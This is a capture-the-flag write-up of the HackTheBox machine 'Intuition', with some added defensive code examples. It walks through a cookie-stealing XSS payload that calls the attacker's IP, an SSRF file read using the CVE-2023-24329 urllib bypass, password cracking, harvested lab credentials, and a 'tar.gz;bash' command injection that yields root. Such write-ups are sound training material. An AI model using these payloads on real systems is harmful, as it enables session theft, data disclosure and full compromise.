HTB - Intuition [Hard]
TCP Scan
> TARGET=10.129.54.182 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://comprezzor.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
- add the domain to /etc/hosts
echo '10.129.54.182 comprezzor.htb' >> /etc/hosts
web enum
wfuzz -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://comprezzor.htb/" -H "Host: FUZZ.comprezzor.htb" --hl 107
* alternative wordlist: /usr/share/wordlists/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt
000000291: 302 5 L 22 W 199 Ch "auth"
000000485: 200 108 L 299 W 3166 Ch "report"
000000516: 302 5 L 22 W 251 Ch "dashboard"
auth.comprezzor.htb report.comprezzor.htb dashboard.comprezzor.htb
report.comprezzor.htb
- browse to report.comprezzor.htb
there is a report_bug feature; register an account and log in to use it
- send a bug report with the following payload and set up a listener to catch the callback
# <img src=x onerror=fetch("http://10.10.14.121/?test2="+document.cookie)>
report_title=test&description=%3Cimg+src%3Dx+onerror%3Dfetch%28%22http%3A%2F%2F10.10.14.121%2F%3Ftest2%3D%22%2Bdocument.cookie%29%3E
10.129.54.182 - - [28/Apr/2024 18:42:32] "GET /test?user_data=eyJ1c2VyX2lkIjogMiwgInVzZXJuYW1lIjogImFkYW0iLCAicm9sZSI6ICJ3ZWJkZXYifXw1OGY2ZjcyNTMzOWNlM2Y2OWQ4NTUyYTEwNjk2ZGRlYmI2OGIyYjU3ZDJlNTIzYzA4YmRlODY4ZDNhNzU2ZGI4 HTTP/1.1"
- browse to dashboard.comprezzor.htb
- this is the cookie of the user who read the report; base64 decode it (it belongs to adam with role webdev, not yet the admin)
{"user_id": 2, "username": "adam", "role": "webdev"}|58f6f725339ce3f69d8552a10696ddebb68b2b57d2e523c08bde868d3a756db8
- browse to the submitted ticket and set its priority to high, then the admin will read the ticket
eyJ1c2VyX2lkIjogMSwgInVzZXJuYW1lIjogImFkbWluIiwgInJvbGUiOiAiYWRtaW4ifXwzNDgyMjMzM2Q0NDRhZTBlNDAyMmY2Y2M2NzlhYzlkMjZkMWQxZDY4MmM1OWM2MWNmYmVhMjlkNzc2ZDU4OWQ5
- set up a listener to capture the admin's cookie; in the admin dashboard there is a link to http://dashboard.comprezzor.htb/create_pdf_report
- craft a request to it with a listener running: this endpoint makes the target fetch a URL and render it into a PDF report
curl -H "cookie: user_data=cookie" http://dashboard.comprezzor.htb/create_pdf_report -d "report_url=http://10.10.14.121:8888/" -o-
found wkhtmltopdf 0.12.6 in the pdf report
- with a listener set up, the request headers show User-Agent Python-urllib/3.11, which is vulnerable to CVE-2023-24329
- check out this post: https://vsociety.medium.com/cve-2023-24329-bypassing-url-blackslisting-using-blank-in-python-urllib-library-ee438679351d
python3 ../pserver.py 8888
INFO:root:Starting httpd...
INFO:root:GET request,
Path: /index.html
Headers:
Accept-Encoding: identity
Host: 10.10.14.121:8888
User-Agent: Python-urllib/3.11
Cookie: user_data=cookie
Connection: close
- so simply inserting a space before a URL such as file:///etc/passwd bypasses the check and gives arbitrary file read
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
avahi:x:105:110:Avahi mDNS daemon,,,:/run/avahi-daemon:/usr/sbin/nologin
geoclue:x:106:111::/var/lib/geoclue:/usr/sbin/nologin
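Added example (not from the original writeup) showing why the blank-prefix bypass works and the check that closes it: the validator sees the URL through urlparse(), but urllib.request normalises it with unwrap() before opening, which strips the leading blank, so the two views disagree on unpatched Python. The hostnames and probe string are constructed; denylist_passes() gives a version-dependent answer and is only there to contrast with the hardened allowlist check.

```python
from urllib.parse import unwrap, urlparse
from urllib.request import Request

BLOCKED_SCHEMES = {"file", "ftp", "gopher"}   # denylist style, as a weak filter might do
ALLOWED_SCHEMES = {"http", "https"}           # allowlist style, for the hardened check


def denylist_passes(url: str) -> bool:
    """Weak pattern: parse the raw string and reject only known-bad schemes.
    Before the CVE-2023-24329 fix (3.12, backported to 3.11.4 and older
    branches) urlparse() kept a leading blank, so ' file:///etc/passwd'
    parsed with scheme '' and slipped past this check."""
    return urlparse(url).scheme not in BLOCKED_SCHEMES


def fetcher_scheme(url: str) -> str:
    """What urllib.request would actually open: Request() runs unwrap(), which
    strips the blank, so the same string is handled as a file:// URL."""
    return Request(url).type


def is_allowed_report_url(url: str) -> bool:
    """Hardened check: normalise exactly as the fetcher does, then allowlist
    the scheme and require a host. Rejects file://, ftp:// and blank-prefixed
    forms on every Python version, patched or not. A production filter would
    additionally resolve the host and refuse loopback/private addresses."""
    parts = urlparse(unwrap(url))
    return parts.scheme in ALLOWED_SCHEMES and bool(parts.hostname)


if __name__ == "__main__":
    probe = " file:///etc/passwd"   # constructed probe: leading blank, then the page's payload
    print("denylist view:", denylist_passes(probe))       # True on unpatched Python
    print("fetcher view: ", fetcher_scheme(probe))        # file
    print("hardened view:", is_allowed_report_url(probe)) # False
```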
# file:///proc/self/cmdline
python3/app/code/app.py
# file:///app/code/app.py
from flask import Flask, request, redirect
from blueprints.index.index import main_bp
from blueprints.report.report import report_bp
from blueprints.auth.auth import auth_bp
from blueprints.dashboard.dashboard import dashboard_bp
app = Flask(__name__)
app.secret_key = "7ASS7ADA8RF3FD7"
app.config['SERVER_NAME'] = 'comprezzor.htb'
app.config['MAX_CONTENT_LENGTH'] = 5 * 1024 * 1024  # Limit file size to 5MB
ALLOWED_EXTENSIONS = {'txt', 'pdf', 'docx'}  # Add more allowed file extensions if needed

app.register_blueprint(main_bp)
app.register_blueprint(report_bp, subdomain='report')
app.register_blueprint(auth_bp, subdomain='auth')
app.register_blueprint(dashboard_bp, subdomain='dashboard')

if __name__ == '__main__':
    app.run(debug=False, host="0.0.0.0", port=80)
# file:///app/code/blueprints/dashboard/dashboard.py
ftp = FTP('ftp.local')
ftp.login(user='ftp_admin', passwd='u3jai8y71s2')
ftp.cwd('/')
# file:///app/code/blueprints/auth/auth_utils.py
there is a sqlite3 db called users.db
ftp.local
- use the same create_pdf_report URL to make the target connect to the ftp server
# ftp://ftp_admin:u3jai8y71s2@ftp.local
-rw------- 1 root root 2655 Apr 29 01:45 private-8297.key
-rw-r--r-- 1 root root 15519 Apr 29 01:45 welcome_note.pdf
-rw-r--r-- 1 root root 1732 Apr 29 01:45 welcome_note.txt
# ftp://ftp_admin:u3jai8y71s2@ftp.local/private-8297.key
get the private key
# ftp://ftp_admin:u3jai8y71s2@ftp.local/welcome_note.txt
Dear Devs, We are thrilled to extend a warm welcome to you as you embark on this exciting journey with us. Your
arrival marks the beginning of an inspiring chapter in our collective pursuit of excellence, and we are genuinely
delighted to have you on board. Here, we value talent, innovation, and teamwork, and your presence here reaffirms our
commitment to nurturing a diverse and dynamic workforce. Your skills, experience, and unique perspectives are
invaluable assets that will contribute significantly to our continued growth and success. As you settle into your new
role, please know that you have our unwavering support. Our team is here to guide and assist you every step of the way,
ensuring that you have the resources and knowledge necessary to thrive in your position. To facilitate your work and
access to our systems, we have attached an SSH private key to this email. You can use the following passphrase to
access it, `Y27SH19HDIWD`. Please ensure the utmost confidentiality and security when using this key. If you have any
questions or require assistance with server access or any other aspect of your work, please do not hesitate to reach out
for assistance. In addition to your technical skills, we encourage you to bring your passion, creativity, and innovative
thinking to the table. Your contributions will play a vital role in shaping the future of our projects and products. Once
again, welcome to your new family. We look forward to getting to know you, collaborating with you, and witnessing
your exceptional contributions. Together, we will continue to achieve great things. If you have any questions or need
further information, please feel free to me at adam@comprezzor.htb. Best regards, Adam
- generate a usable key file from the above private key by removing its passphrase (the passphrase is in the welcome note)
> ssh-keygen -p -N "" -m pem -f private-8297.key
Enter old passphrase:
Key has comment 'dev_acc@local'
Your identification has been saved with the new passphrase.
- access the target to get the user flag
ssh -i private-8297.key dev_acc@comprezzor.htb
dev_acc@intuition:~$ ls
user.txt
dev_acc@intuition:~$ cat user.txt
13c44b4b6263a2fbc5ed139142834394
dev_acc@intuition:~$
PE (privilege escalation)
- search for the previously found users.db file
dev_acc@intuition:~$ find / -type f -name users.db 2>/dev/null
/var/www/app/blueprints/auth/users.db
- download it locally and crack the hashes it contains
sha256$nypGJ02XBnkIQK71$f0e11dc8ad21242b550cc8a3c27baaf1022b6522afaadbfa92bd612513e9b606
sha256$Z7bcBO9P43gvdQWp$a67ea5f8722e69ee99258f208dc56a1d5d631f287106003595087cf42189fc43
> hashcat.exe -m 30120 hash.txt rockyou.txt
sha256$Z7bcBO9P43gvdQWp$a67ea5f8722e69ee99258f208dc56a1d5d631f287106003595087cf42189fc43:adam gray
- log in to ftp as adam
dev_acc@intuition:~$ ftp localhost
Connected to localhost.
220 pyftpdlib 1.5.7 ready.
Name (localhost:dev_acc): adam
331 Username ok, send password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering extended passive mode (|||39073|).
125 Data connection already open. Transfer starting.
drwxr-xr-x 3 root 1002 4096 Apr 10 08:21 backup
226 Transfer complete.
ftp> cd backup
250 "/backup" is the current directory.
ftp> ls
229 Entering extended passive mode (|||32967|).
150 File status okay. About to open data connection.
drwxr-xr-x 2 root 1002 4096 Apr 10 08:21 runner1
226 Transfer complete.
ftp> cd runner1
250 "/backup/runner1" is the current directory.
ftp> ls
229 Entering extended passive mode (|||39347|).
150 File status okay. About to open data connection.
-rwxr-xr-x 1 root 1002 318 Apr 06 00:25 run-tests.sh
-rwxr-xr-x 1 root 1002 16744 Oct 19 2023 runner1
-rw-r--r-- 1 root 1002 3815 Oct 19 2023 runner1.c
226 Transfer complete.
ftp> get run-tests.sh
ftp> get runner1.c
ftp> get runner1
- retrieved files:
#!/bin/bash
# List playbooks
./runner1 list
# Run playbooks [Need authentication]
# ./runner run [playbook number] -a [auth code]
#./runner1 run 1 -a "UHI75GHI****"
# Install roles [Need authentication]
# ./runner install [role url] -a [auth code]
#./runner1 install http://role.host.tld/role.tar -a "UHI75GHI****"
- from runner1.c (lines 13 and 24):
#define AUTH_KEY_HASH "0feda17076d793c2ef2870d7427ad4ed"
...
if (strcmp(md5_str, AUTH_KEY_HASH) == 0) {
- crack the hash
> hashcat.exe hash.txt -a 3 -m 0 -1 ?l?u?d?s UHI75GHI?1?1?1?1
0feda17076d793c2ef2870d7427ad4ed:UHI75GHINKOP
./runner1 install http://role.host.tld/role.tar -a "UHI75GHINKOP"
- local enum
2024/04/29 02:50:20 CMD: UID=0 PID=2013 | python3 /ftp/server.py
2024/04/29 02:50:20 CMD: UID=1200 PID=1916 | python3 -m websockify --web /opt/bin/noVNC 7900 localhost:5900
2024/04/29 04:00:01 CMD: UID=0 PID=88146 | /bin/sh /root/scripts/cleanup/cleanup.sh
2024/04/29 04:00:01 CMD: UID=0 PID=88148 | /usr/bin/cp -r /root/scripts/cleanup/ftp_admin/private-8297.key /root/scripts/cleanup/ftp_admin/welcome_note.pdf /root/scripts/cleanup/ftp_admin/welcome_note.txt /opt/ftp/ftp_admin/
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:21 0.0.0.0:* LISTEN -
tcp 0 0 172.21.0.1:21 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:4444 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:33791 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
Found lib_mysqludf_sys.so:
If you can login in MySQL you can execute commands doing: SELECT sys_eval('id');
- in the admin dashboard there is a backup feature: create a backup, quickly log in to ftp as ftp_admin, and get the backup file before it is deleted
ftp> ls
229 Entering extended passive mode (|||46617|).
125 Data connection already open. Transfer starting.
-rw-r--r-- 1 root root 53224 Apr 29 03:40 app_backup_20240429034044.zip
-rw------- 1 root root 2655 Apr 29 03:40 private-8297.key
-rw-r--r-- 1 root root 15519 Apr 29 03:40 welcome_note.pdf
-rw-r--r-- 1 root root 1732 Apr 29 03:40 welcome_note.txt
226 Transfer complete.
ftp> get app_backup_20240429034044.zip
local: app_backup_20240429034044.zip remote: app_backup_20240429034044.zip
dev_acc@intuition:~$ find / -type f -user lopez 2>/dev/null
/etc/ansible/roles/kavi.tar/meta/main.yml
/usr/share/ansible/roles/kavi.tar/meta/main.yml
- check recently changed files
find / -type f -newermt '2024-04-01' -not -path "/usr/*" -not -path "/sys/*" -not -path "/proc/*" -not -path "/run/*" -not -path "/boot/*" -not -path "/var/lib/*" -ls 2>/dev/null
- check log files
dev_acc@intuition:~$ zgrep -i lopez /var/log/suricata/*.gz
/var/log/suricata/eve.json.7.gz:{"timestamp":"2023-09-28T17:43:36.099184+0000","flow_id":1988487100549589,"in_iface":"ens33","event_type":"ftp","src_ip":"192.168.227.229","src_port":37522,"dest_ip":"192.168.227.13","dest_port":21,"proto":"TCP","tx_id":1,"community_id":"1:SLaZvboBWDjwD/SXu/SOOcdHzV8=","ftp":{"command":"USER","command_data":"lopez","completion_code":["331"],"reply":["Username ok, send password."],"reply_received":"yes"}}
/var/log/suricata/eve.json.7.gz:{"timestamp":"2023-09-28T17:43:52.999165+0000","flow_id":1988487100549589,"in_iface":"ens33","event_type":"ftp","src_ip":"192.168.227.229","src_port":37522,"dest_ip":"192.168.227.13","dest_port":21,"proto":"TCP","tx_id":2,"community_id":"1:SLaZvboBWDjwD/SXu/SOOcdHzV8=","ftp":{"command":"PASS","command_data":"Lopezzz1992%123","completion_code":["530"],"reply":["Authentication failed."],"reply_received":"yes"}}
/var/log/suricata/eve.json.7.gz:{"timestamp":"2023-09-28T17:44:32.133372+0000","flow_id":1218304978677234,"in_iface":"ens33","event_type":"ftp","src_ip":"192.168.227.229","src_port":45760,"dest_ip":"192.168.227.13","dest_port":21,"proto":"TCP","tx_id":1,"community_id":"1:hzLyTSoEJFiGcXoVyvk2lbJlaF0=","ftp":{"command":"USER","command_data":"lopez","completion_code":["331"],"reply":["Username ok, send password."],"reply_received":"yes"}}
/var/log/suricata/eve.json.7.gz:{"timestamp":"2023-09-28T17:44:48.188361+0000","flow_id":1218304978677234,"in_iface":"ens33","event_type":"ftp","src_ip":"192.168.227.229","src_port":45760,"dest_ip":"192.168.227.13","dest_port":21,"proto":"TCP","tx_id":2,"community_id":"1:hzLyTSoEJFiGcXoVyvk2lbJlaF0=","ftp":{"command":"PASS","command_data":"Lopezz1992%123","completion_code":["230"],"reply":["Login successful."],"reply_received":"yes"}}
ftp_admin:u3jai8y71s2 lopez:Lopezz1992%123
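An added example, not part of the original writeup, that turns the zgrep above into a small detection over eve.json: it pairs FTP USER and PASS commands per flow_id, classifies the server reply, and reports failed-then-successful logins together with the fact that the password was captured in clear text. The sample lines, addresses, account name and secrets below are constructed.

```python
import json

# Constructed eve.json lines in the shape of the page's entries (event_type
# "ftp", one USER/PASS pair per flow). Addresses and secrets are made up.
SAMPLE_EVE = """
{"timestamp":"2023-09-28T17:43:36.099184+0000","flow_id":1,"event_type":"ftp","src_ip":"192.0.2.10","dest_ip":"192.0.2.20","dest_port":21,"ftp":{"command":"USER","command_data":"someuser","completion_code":["331"]}}
{"timestamp":"2023-09-28T17:43:52.999165+0000","flow_id":1,"event_type":"ftp","src_ip":"192.0.2.10","dest_ip":"192.0.2.20","dest_port":21,"ftp":{"command":"PASS","command_data":"wrong-secret","completion_code":["530"]}}
{"timestamp":"2023-09-28T17:44:32.133372+0000","flow_id":2,"event_type":"ftp","src_ip":"192.0.2.10","dest_ip":"192.0.2.20","dest_port":21,"ftp":{"command":"USER","command_data":"someuser","completion_code":["331"]}}
{"timestamp":"2023-09-28T17:44:48.188361+0000","flow_id":2,"event_type":"ftp","src_ip":"192.0.2.10","dest_ip":"192.0.2.20","dest_port":21,"ftp":{"command":"PASS","command_data":"right-secret","completion_code":["230"]}}
{"timestamp":"2023-09-28T17:45:00.000000+0000","flow_id":3,"event_type":"alert","src_ip":"192.0.2.10","dest_ip":"192.0.2.20"}
"""


def ftp_login_events(lines):
    """Correlate FTP USER and PASS commands by flow_id and classify the reply.
    The password value is deliberately not copied out; the finding is that a
    clear-text credential crossed the wire at all (Suricata logs it verbatim)."""
    pending = {}      # flow_id -> username announced by USER
    findings = []
    for raw in lines:
        raw = raw.strip()
        if not raw:
            continue
        ev = json.loads(raw)
        if ev.get("event_type") != "ftp":
            continue
        ftp = ev["ftp"]
        if ftp.get("command") == "USER":
            pending[ev["flow_id"]] = ftp.get("command_data", "?")
        elif ftp.get("command") == "PASS":
            code = (ftp.get("completion_code") or ["?"])[0]   # 230 = login OK, 530 = failed
            findings.append({
                "timestamp": ev["timestamp"],
                "src_ip": ev["src_ip"],
                "user": pending.pop(ev["flow_id"], "?"),
                "outcome": "success" if code == "230" else "failure",
                "cleartext_password_logged": bool(ftp.get("command_data")),
            })
    return findings


def successful_after_failure(findings):
    """(src_ip, user) pairs that failed at least once and later succeeded, the
    pattern visible in the page's log excerpt; worth an alert and a credential reset."""
    failed = {(f["src_ip"], f["user"]) for f in findings if f["outcome"] == "failure"}
    return sorted({(f["src_ip"], f["user"]) for f in findings
                   if f["outcome"] == "success" and (f["src_ip"], f["user"]) in failed})
```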
- check sudo
lopez@intuition:~$ sudo -l
[sudo] password for lopez:
Matching Defaults entries for lopez on intuition:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User lopez may run the following commands on intuition:
(ALL : ALL) /opt/runner2/runner2
- enum
/opt/playbooks/inventory.ini
[local]
127.0.0.1
127.0.0.1 ansible_ssh_user=root ansible_ssh_private_key_file=/root/keys/private.key
[docker_web_servers]
172.21.0.2
/opt/playbooks/apt_update.yml
---
- name: Update and Upgrade APT Packages test
  hosts: local
  become: yes
  tasks:
    - name: Update APT Cache
      apt:
        update_cache: yes
      when: ansible_distribution == 'Debian' or ansible_distribution == 'Ubuntu'
    - name: Upgrade APT Packages
      apt:
        upgrade: dist
        update_cache: yes
      when: ansible_distribution == 'Debian' or ansible_distribution == 'Ubuntu'
- refer to https://github.com/coopdevs/sys-admins-role for an example tar.gz file
- create a JSON file for runner2
{"run":{"action":"install","role_file":"exploit.tar.gz;bash"},"auth_code":"UHI75GHINKOP"}
- fetch the tar.gz and the JSON onto the target, then run runner2 with sudo
lopez@intuition:~$ wget http://10.10.14.121/exploit.json -O exploit.json && wget http://10.10.14.121/exploit.tar.gz -O 'exploit.tar.gz;bash' && sudo /opt/runner2/runner2 exploit.json
--2024-04-29 10:15:40-- http://10.10.14.121/exploit.json
Connecting to 10.10.14.121:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 89 [application/json]
Saving to: ‘exploit.json’
exploit.json 100%[====================================================================================>] 89 --.-KB/s in 0s
2024-04-29 10:15:40 (7.00 MB/s) - ‘exploit.json’ saved [89/89]
--2024-04-29 10:15:40-- http://10.10.14.121/exploit.tar.gz
Connecting to 10.10.14.121:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13787 (13K) [application/gzip]
Saving to: ‘exploit.tar.gz;bash’
exploit.tar.gz;bash 100%[====================================================================================>] 13.46K 58.7KB/s in 0.2s
2024-04-29 10:15:41 (58.7 KB/s) - ‘exploit.tar.gz;bash’ saved [13787/13787]
Starting galaxy role install process
- exploit.tar.gz is already installed, skipping.
root@intuition:/home/lopez# id
uid=0(root) gid=0(root) groups=0(root)
root@intuition:/home/lopez# cat /root/root.txt
3de0191f22527e88604dac5007d232a0
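Added example (not the box's runner2 code, whose source the writeup does not show) of the input validation that would have stopped the role_file injection above: a strict archive-name pattern and an argv list that is run without a shell, so a name like exploit.tar.gz;bash is rejected instead of being spliced into a command line. The placeholder auth code, its SHA-256 comparison and the ansible-galaxy argv are assumptions.

```python
import hashlib
import hmac
import json
import re

# Request shape taken from the page:
# {"run": {"action": "install", "role_file": "<name>"}, "auth_code": "<code>"}
# Constructed placeholder secret (the real runner compares an MD5 of its code).
AUTH_CODE_HASH = hashlib.sha256(b"PLACEHOLDER-AUTH-CODE").hexdigest()

# A role archive name and nothing else: no '/', ';', spaces or leading dot.
ROLE_FILE_RE = re.compile(r"[A-Za-z0-9_][A-Za-z0-9_.-]*\.tar(\.gz)?")


def check_install_request(request_json: str):
    """Validate the request; return (argv, "") on success or (None, reason).
    argv is meant for subprocess.run(argv) with shell=False, so role_file
    travels as a single argument and is never parsed by /bin/sh."""
    try:
        req = json.loads(request_json)
    except ValueError:
        return None, "malformed JSON"
    if not isinstance(req, dict):
        return None, "malformed JSON"
    code = str(req.get("auth_code", ""))
    digest = hashlib.sha256(code.encode()).hexdigest()
    if not hmac.compare_digest(digest, AUTH_CODE_HASH):   # constant-time compare
        return None, "bad auth code"
    run = req.get("run") or {}
    if run.get("action") != "install":
        return None, "unsupported action"
    role_file = str(run.get("role_file", ""))
    if not ROLE_FILE_RE.fullmatch(role_file):
        return None, f"invalid role_file name: {role_file!r}"
    # Hypothetical command; the page only shows the runner's galaxy-style output.
    return ["ansible-galaxy", "role", "install", role_file], ""
```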
Support meowmeow
If you find this article useful, please support: https://www.buymeacoffee.com/meowmeowattack